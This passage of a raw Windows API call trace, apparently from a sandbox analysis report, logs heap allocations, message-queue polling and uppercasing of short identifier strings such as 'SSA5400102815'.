Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.876] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0267.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.877] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0267.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.878] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.878] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.878] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.879] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0267.879] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.880] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0267.880] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.881] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0267.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0267.883] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.883] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.883] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0267.883] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.884] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0267.884] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0267.884] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.885] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.886] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0267.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d960 [0267.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0267.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.887] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0267.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.888] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0267.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 